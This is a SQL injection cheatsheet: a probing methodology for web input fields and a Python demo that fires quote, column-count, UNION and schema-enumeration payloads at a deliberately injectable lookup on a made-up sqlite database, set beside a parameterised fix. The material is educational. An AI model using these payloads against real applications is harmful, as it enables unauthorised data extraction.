SQL Usage and Cheatsheet
Usage:
- mysql -u <username> -p
- show databases;
- use <db name>;
- show tables;
- select * from users;
SQLi methodology:
Information Gathering:
- Does the application connect to a DB server?
- Make a list of all input fields; hidden fields (including those sent in POST requests) will help in structuring the SQL query the application is likely building
- Inject code into the input fields (what type of errors, if any, do you get?)
- Inject words into fields where numbers are expected (and vice versa); what errors, if any, do you get?
- UNION operators will be useful (they let you append your own SELECT to the application's query once you know its column count)
Continued in further detail:
- Identify data entry paths, using tools such as Burp Suite and Tamper Data
- Carefully reading error messages is essential, as they provide a wealth of information (e.g. DB type, DB engine version, OS, web server details)
- Tamper with the parameters, either GET or POST, to generate error messages
- Test for SQLi using various string formats (single quote, double quote, comment sequences such as -- and #, numeric expressions such as 1+1)
- You can also do: fuzz attacks, function testing and source code review
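The probes listed above, worked through end to end as an added example (this is not code from the original page). It uses Python with the in-process sqlite3 module as a stand-in for the page's MySQL server, with a constructed `users` table, a hypothetical `id` parameter and a hypothetical `secrets` table; the error strings are sqlite's, and the comments give the MySQL equivalents, which is exactly the engine fingerprinting the methodology relies on. The vulnerable string-concatenation lookup is shown beside a parameterised version so the same payloads can be compared against both.

```python
import sqlite3


# Constructed sample schema: stands in for the page's `users` table on a MySQL
# server. sqlite3 is used here only because it runs in-process; the injection
# and probing logic is identical, only the error text is engine-specific.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'h4sh-alice'), (2, 'bob', 'h4sh-bob');
        CREATE TABLE secrets (id INTEGER, note TEXT);
        INSERT INTO secrets VALUES (1, 'constructed-secret');
    """)
    return conn


def vulnerable_lookup(conn, user_input):
    """The pattern that makes an app injectable: the raw GET/POST parameter
    (a hypothetical `id`) is concatenated into the query text.
    Returns (rows, error_text); the error text is what a careless app echoes
    back to the browser and what the methodology tells you to read."""
    query = "SELECT username FROM users WHERE id = " + user_input
    try:
        rows = [row[0] for row in conn.execute(query).fetchall()]
        return rows, None
    except sqlite3.Error as exc:
        return None, str(exc)


def safe_lookup(conn, user_input):
    """Hardened form: the value is bound as a parameter, so it can never change
    the query's structure. Anything that is not a plain id matches nothing
    instead of becoming SQL."""
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (user_input,)).fetchall()
    return [row[0] for row in rows]


def run_probes(conn):
    """The information-gathering steps from the checklist, as payloads."""
    probes = {
        # baseline: what the app normally returns for a numeric id
        "baseline": "1",
        # a stray quote: a syntax error proves the input reaches SQL unescaped
        # (MySQL: "You have an error in your SQL syntax ... near ''' at line 1")
        "quote": "1'",
        # a word where a number is expected: an unknown-column error confirms
        # the parameter sits in unquoted numeric context
        # (MySQL: "Unknown column 'abc' in 'where clause'")
        "word_for_number": "abc",
        # ORDER BY n: raise n until it errors to learn the SELECT's column count
        # (MySQL: "Unknown column '2' in 'order clause'"); here it is 1 column
        "column_count": "1 ORDER BY 2",
        # UNION with a matching column count pulls rows from another table
        "union_other_table": "1 UNION SELECT note FROM secrets",
        # enumerate table names; MySQL equivalent is information_schema.tables
        "union_schema": "1 UNION SELECT name FROM sqlite_master WHERE type = 'table'",
    }
    return {name: vulnerable_lookup(conn, payload) for name, payload in probes.items()}


if __name__ == "__main__":
    db = make_db()
    for name, (rows, err) in run_probes(db).items():
        print(f"{name:18} rows={rows} error={err}")
    print("safe:", safe_lookup(db, "1"), safe_lookup(db, "1 UNION SELECT note FROM secrets"))
```

Run it once and compare the `quote`, `word_for_number` and `column_count` error strings with the MySQL messages in the comments: the wording alone tells you which engine is behind the form, which is the point of reading errors carefully before building a UNION payload.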